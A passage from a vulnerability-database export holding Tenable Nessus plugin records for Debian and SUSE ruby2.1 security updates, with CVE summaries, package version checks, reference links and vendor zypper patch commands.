A\nmis-signed gem could be installed if the tarball contains multiple gem\nsignatures.\n\nCVE-2018-1000077\n\nAn improper input validation vulnerability in RubyGems specification\nhomepage attribute could allow malicious gem to set an invalid\nhomepage URL.\n\nCVE-2018-1000078\n\nCross Site Scripting (XSS) vulnerability in gem server display of\nhomepage attribute.\n\nCVE-2018-1000079\n\nPath Traversal vulnerability during gem installation.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/ruby2.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libruby2.1\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-dev\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-doc\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-tcltk\", reference:\"2.1.5-2+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:06:53", "description": "This update for ruby2.1 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2015-9096: 
Fixed an SMTP command injection via CRLF sequences in a RCPT TO or MAIL FROM command (bsc#1043983).\n\nCVE-2016-7798: Fixed an IV Reuse in GCM Mode (bsc#1055265).\n\nCVE-2017-0898: Fixed a buffer underrun vulnerability in Kernel.sprintf (bsc#1058755).\n\nCVE-2017-0899: Fixed an issue with malicious gem specifications, insufficient sanitation when printing gem specifications could have included terminal characters (bsc#1056286).\n\nCVE-2017-0900: Fixed an issue with malicious gem specifications, the query command could have led to a denial of service attack against clients (bsc#1056286).\n\nCVE-2017-0901: Fixed an issue with malicious gem specifications, potentially overwriting arbitrary files on the client system (bsc#1056286).\n\nCVE-2017-0902: Fixed an issue with malicious gem specifications, that could have enabled MITM attacks against clients (bsc#1056286).\n\nCVE-2017-0903: Fixed an unsafe object deserialization vulnerability (bsc#1062452).\n\nCVE-2017-9228: Fixed a heap out-of-bounds write in bitset_set_range() during regex compilation (bsc#1069607).\n\nCVE-2017-9229: Fixed an invalid pointer dereference in left_adjust_char_head() in oniguruma (bsc#1069632).\n\nCVE-2017-10784: Fixed an escape sequence injection vulnerability in the Basic authentication of WEBrick (bsc#1058754).\n\nCVE-2017-14033: Fixed a buffer underrun vulnerability in OpenSSL ASN1 decode (bsc#1058757).\n\nCVE-2017-14064: Fixed an arbitrary memory exposure during a JSON.generate call (bsc#1056782).\n\nCVE-2017-17405: Fixed a command injection vulnerability in Net::FTP (bsc#1073002).\n\nCVE-2017-17742: Fixed an HTTP response splitting issue in WEBrick (bsc#1087434).\n\nCVE-2017-17790: Fixed a command injection in lib/resolv.rb:lazy_initialize() (bsc#1078782).\n\nCVE-2018-6914: Fixed an unintentional file and directory creation with directory traversal in tempfile and tmpdir (bsc#1087441).\n\nCVE-2018-8777: Fixed a potential DoS caused by large requests in WEBrick 
(bsc#1087436).\n\nCVE-2018-8778: Fixed a buffer under-read in String#unpack (bsc#1087433).\n\nCVE-2018-8779: Fixed an unintentional socket creation by poisoned NUL byte in UNIXServer and UNIXSocket (bsc#1087440).\n\nCVE-2018-8780: Fixed an unintentional directory traversal by poisoned NUL byte in Dir (bsc#1087437).\n\nCVE-2018-16395: Fixed an issue with OpenSSL::X509::Name equality checking (bsc#1112530).\n\nCVE-2018-16396: Fixed an issue with tainted string handling, where the flag was not propagated in Array#pack and String#unpack with some directives (bsc#1112532).\n\nCVE-2018-1000073: Fixed a path traversal issue (bsc#1082007).\n\nCVE-2018-1000074: Fixed an unsafe object deserialization vulnerability in gem owner, allowing arbitrary code execution with specially crafted YAML (bsc#1082008).\n\nCVE-2018-1000075: Fixed an infinite loop vulnerability due to negative size in tar header causes Denial of Service (bsc#1082014).\n\nCVE-2018-1000076: Fixed an improper verification of signatures in tarballs (bsc#1082009).\n\nCVE-2018-1000077: Fixed an improper URL validation in the homepage attribute of ruby gems (bsc#1082010).\n\nCVE-2018-1000078: Fixed a XSS vulnerability in the homepage attribute when displayed via gem server (bsc#1082011).\n\nCVE-2018-1000079: Fixed a path traversal issue during gem installation allows to write to arbitrary filesystem locations (bsc#1082058).\n\nCVE-2019-8320: Fixed a directory traversal issue when decompressing tar files (bsc#1130627).\n\nCVE-2019-8321: Fixed an escape sequence injection vulnerability in verbose (bsc#1130623).\n\nCVE-2019-8322: Fixed an escape sequence injection vulnerability in gem owner (bsc#1130622).\n\nCVE-2019-8323: Fixed an escape sequence injection vulnerability in API response handling (bsc#1130620).\n\nCVE-2019-8324: Fixed an issue with malicious gems that may have led to arbitrary code execution (bsc#1130617).\n\nCVE-2019-8325: Fixed an escape sequence injection vulnerability in errors 
(bsc#1130611).\n\nCVE-2019-15845: Fixed a NUL injection vulnerability in File.fnmatch and File.fnmatch? (bsc#1152994).\n\nCVE-2019-16201: Fixed a regular expression denial of service vulnerability in WEBrick's digest access authentication (bsc#1152995).\n\nCVE-2019-16254: Fixed an HTTP response splitting vulnerability in WEBrick (bsc#1152992).\n\nCVE-2019-16255: Fixed a code injection vulnerability in Shell#[] and Shell#test (bsc#1152990).\n\nCVE-2020-10663: Fixed an unsafe object creation vulnerability in JSON (bsc#1171517).\n\nNon-security issue fixed :\n\nAdd conflicts to libruby to make sure ruby and ruby-stdlib are also updated when libruby is updated (bsc#1048072).\n\nAlso yast2-ruby-bindings on SLES 12 SP2 LTSS was updated to handle the updated ruby interpreter. (bsc#1172275)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-06-18T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : ruby2.1 (SUSE-SU-2020:1570-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-1000073", "CVE-2018-1000074", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-16395", "CVE-2018-16396", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780", "CVE-2019-15845", "CVE-2019-16201", "CVE-2019-16254", "CVE-2019-16255", "CVE-2019-8320", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325", "CVE-2020-10663"], "modified": 
"2022-05-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libruby2_1", "p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1", "p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1-debugsource", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo", "p-cpe:/a:novell:suse_linux:yast2-ruby-bindings", "p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debuginfo", "p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-1570-1.NASL", "href": "https://www.tenable.com/plugins/nessus/137599", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1570-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137599);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2015-9096\",\n \"CVE-2016-2339\",\n \"CVE-2016-7798\",\n \"CVE-2017-0898\",\n \"CVE-2017-0899\",\n \"CVE-2017-0900\",\n \"CVE-2017-0901\",\n \"CVE-2017-0902\",\n \"CVE-2017-0903\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-10784\",\n \"CVE-2017-14033\",\n \"CVE-2017-14064\",\n \"CVE-2017-17405\",\n \"CVE-2017-17742\",\n \"CVE-2017-17790\",\n \"CVE-2018-6914\",\n \"CVE-2018-8777\",\n \"CVE-2018-8778\",\n \"CVE-2018-8779\",\n \"CVE-2018-8780\",\n \"CVE-2018-16395\",\n \"CVE-2018-16396\",\n \"CVE-2018-1000073\",\n \"CVE-2018-1000074\",\n \"CVE-2018-1000075\",\n \"CVE-2018-1000076\",\n \"CVE-2018-1000077\",\n \"CVE-2018-1000078\",\n \"CVE-2018-1000079\",\n \"CVE-2019-8320\",\n \"CVE-2019-8321\",\n \"CVE-2019-8322\",\n \"CVE-2019-8323\",\n \"CVE-2019-8324\",\n \"CVE-2019-8325\",\n \"CVE-2019-15845\",\n \"CVE-2019-16201\",\n \"CVE-2019-16254\",\n \"CVE-2019-16255\",\n 
\"CVE-2020-10663\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : ruby2.1 (SUSE-SU-2020:1570-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for ruby2.1 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2015-9096: Fixed an SMTP command injection via CRLFsequences in a\nRCPT TO or MAIL FROM command (bsc#1043983).\n\nCVE-2016-7798: Fixed an IV Reuse in GCM Mode (bsc#1055265).\n\nCVE-2017-0898: Fixed a buffer underrun vulnerability in Kernel.sprintf\n(bsc#1058755).\n\nCVE-2017-0899: Fixed an issue with malicious gem specifications,\ninsufficient sanitation when printing gem specifications could have\nincluded terminal characters (bsc#1056286).\n\nCVE-2017-0900: Fixed an issue with malicious gem specifications, the\nquery command could have led to a denial of service attack against\nclients (bsc#1056286).\n\nCVE-2017-0901: Fixed an issue with malicious gem specifications,\npotentially overwriting arbitrary files on the client system\n(bsc#1056286).\n\nCVE-2017-0902: Fixed an issue with malicious gem specifications, that\ncould have enabled MITM attacks against clients (bsc#1056286).\n\nCVE-2017-0903: Fixed an unsafe object deserialization vulnerability\n(bsc#1062452).\n\nCVE-2017-9228: Fixed a heap out-of-bounds write in bitset_set_range()\nduring regex compilation (bsc#1069607).\n\nCVE-2017-9229: Fixed an invalid pointer dereference in\nleft_adjust_char_head() in oniguruma (bsc#1069632).\n\nCVE-2017-10784: Fixed an escape sequence injection vulnerability in\nthe Basic authentication of WEBrick (bsc#1058754).\n\nCVE-2017-14033: Fixed a buffer underrun vulnerability in OpenSSL ASN1\ndecode (bsc#1058757).\n\nCVE-2017-14064: Fixed an arbitrary memory exposure during a\nJSON.generate call (bsc#1056782).\n\nCVE-2017-17405: Fixed a command injection vulnerability in 
Net::FTP\n(bsc#1073002).\n\nCVE-2017-17742: Fixed an HTTP response splitting issue in WEBrick\n(bsc#1087434).\n\nCVE-2017-17790: Fixed a command injection in\nlib/resolv.rb:lazy_initialize() (bsc#1078782).\n\nCVE-2018-6914: Fixed an unintentional file and directory creation with\ndirectory traversal in tempfile and tmpdir (bsc#1087441).\n\nCVE-2018-8777: Fixed a potential DoS caused by large requests in\nWEBrick (bsc#1087436).\n\nCVE-2018-8778: Fixed a buffer under-read in String#unpack\n(bsc#1087433).\n\nCVE-2018-8779: Fixed an unintentional socket creation by poisoned NUL\nbyte in UNIXServer and UNIXSocket (bsc#1087440).\n\nCVE-2018-8780: Fixed an unintentional directory traversal by poisoned\nNUL byte in Dir (bsc#1087437).\n\nCVE-2018-16395: Fixed an issue with OpenSSL::X509::Name equality\nchecking (bsc#1112530).\n\nCVE-2018-16396: Fixed an issue with tainted string handling, where the\nflag was not propagated in Array#pack and String#unpack with some\ndirectives (bsc#1112532).\n\nCVE-2018-1000073: Fixed a path traversal issue (bsc#1082007).\n\nCVE-2018-1000074: Fixed an unsafe object deserialization vulnerability\nin gem owner, allowing arbitrary code execution with specially crafted\nYAML (bsc#1082008).\n\nCVE-2018-1000075: Fixed an infinite loop vulnerability due to negative\nsize in tar header causes Denial of Service (bsc#1082014).\n\nCVE-2018-1000076: Fixed an improper verification of signatures in\ntarballs (bsc#1082009).\n\nCVE-2018-1000077: Fixed an improper URL validation in the homepage\nattribute of ruby gems (bsc#1082010).\n\nCVE-2018-1000078: Fixed a XSS vulnerability in the homepage attribute\nwhen displayed via gem server (bsc#1082011).\n\nCVE-2018-1000079: Fixed a path traversal issue during gem installation\nallows to write to arbitrary filesystem locations (bsc#1082058).\n\nCVE-2019-8320: Fixed a directory traversal issue when decompressing\ntar files (bsc#1130627).\n\nCVE-2019-8321: Fixed an escape sequence injection vulnerability 
in\nverbose (bsc#1130623).\n\nCVE-2019-8322: Fixed an escape sequence injection vulnerability in gem\nowner (bsc#1130622).\n\nCVE-2019-8323: Fixed an escape sequence injection vulnerability in API\nresponse handling (bsc#1130620).\n\nCVE-2019-8324: Fixed an issue with malicious gems that may have led to\narbitrary code execution (bsc#1130617).\n\nCVE-2019-8325: Fixed an escape sequence injection vulnerability in\nerrors (bsc#1130611).\n\nCVE-2019-15845: Fixed a NUL injection vulnerability in File.fnmatch\nand File.fnmatch? (bsc#1152994).\n\nCVE-2019-16201: Fixed a regular expression denial of service\nvulnerability in WEBrick's digest access authentication (bsc#1152995).\n\nCVE-2019-16254: Fixed an HTTP response splitting vulnerability in\nWEBrick (bsc#1152992).\n\nCVE-2019-16255: Fixed a code injection vulnerability in Shell#[] and\nShell#test (bsc#1152990).\n\nCVE-2020-10663: Fixed an unsafe object creation vulnerability in JSON\n(bsc#1171517).\n\nNon-security issue fixed :\n\nAdd conflicts to libruby to make sure ruby and ruby-stdlib are also\nupdated when libruby is updated (bsc#1048072).\n\nAlso yast2-ruby-bindings on SLES 12 SP2 LTSS was updated to handle the\nupdated ruby interpreter. (bsc#1172275)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043983\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056286\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058754\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058755\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058757\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062452\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1073002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082008\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082009\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082010\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082058\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087433\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087434\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087436\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087440\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112530\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112532\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130617\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130620\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130622\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130627\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152990\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152992\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152994\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171517\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-9096/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2339/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-7798/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0898/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0899/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0900/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0901/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0902/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0903/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-10784/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-14033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-14064/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-17405/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2017-17742/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-17790/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-9228/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-9229/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000073/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000074/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000075/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000076/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000077/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000078/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000079/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-16395/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-16396/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-6914/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8777/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8778/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8779/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8780/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2019-15845/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-16201/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-16254/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-16255/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8320/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8321/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8322/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8323/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8324/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8325/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-10663/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201570-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d525cde\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-1570=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-1570=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-1570=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-1570=1\n\nSUSE Linux Enterprise Software Development 
Kit 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP4-2020-1570=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-1570=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-1570=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-1570=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-1570=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-17405\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-16395\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
